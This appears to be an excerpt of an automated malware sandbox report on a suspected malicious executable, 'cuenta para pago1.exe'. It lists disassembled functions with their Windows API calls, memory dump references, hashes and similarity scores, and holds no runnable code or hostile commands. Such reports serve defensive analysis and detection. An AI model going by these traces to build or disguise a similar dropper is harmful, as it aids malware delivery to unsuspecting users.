                                                                                      • Instruction ID: 149acb2e4c8d2ab334bf79ea3f96ce17df26442c265e53a7283cdf21b2f65ea8
                                                                                      • Opcode Fuzzy Hash: 981c7979ba822dccdb72df52fcfe6b7f87be0c37e1a4f4794e53a06bb608896e
                                                                                      • Instruction Fuzzy Hash: B3E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      • Opcode ID: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                                                                      • Instruction ID: 3ece1a6015159183f920534ecfc8dbbbdcbcaab1af18821eb087b1273417be7a
                                                                                      • Opcode Fuzzy Hash: eaacdd191c7eea98fc74c72ee0c8fabea13cd959233ea4d6937bd7f6f4107858
                                                                                      • Instruction Fuzzy Hash: C1E08672304100EBD750CFA4DE49AAA77ACDF403B8F20457BF615E61D1E6B49A41973D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                                      • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                                                                      • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                                                      • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                                      • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                                                                      • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                                                      • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405CA1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                      • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                                                                      • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                      • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4068842862.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068909846.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4068953066.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004022DF Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                                      • Instruction ID: 8b162ba546b3877e829776e4b8c3d619a2c74ac71086561365c339888b8acfb9
                                                                                      • Opcode Fuzzy Hash: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                                      • Instruction Fuzzy Hash: 61E04F30800204BBDF01AFA4CE49DBD3B79AB00344F14043AF900AB1D5E7F89A809749
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040412A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                      • Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
                                                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                      • Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                      • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                                      • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                      • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403222 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00403230
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                                                      • Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
                                                                                      • Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                                                      • Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404100 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00404AF5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                                                      • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F25
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                                                      • InvalidateRect.USER32(?,00000000,?), ref: 00405076
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                                                      • ShowWindow.USER32(00000000), ref: 004050D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                                      • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                                                      • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                                      • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404579 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004046EC
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                                                        • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
